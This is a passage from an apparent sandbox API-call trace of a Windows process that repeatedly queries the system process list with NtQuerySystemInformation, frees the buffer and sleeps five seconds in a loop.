RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.590] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.608] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.621] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.637] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.659] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.673] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.684] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.700] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.721] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.730] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.766] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.777] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.793] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.808] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.824] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.840] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.856] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.871] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.886] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.902] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.916] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.933] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 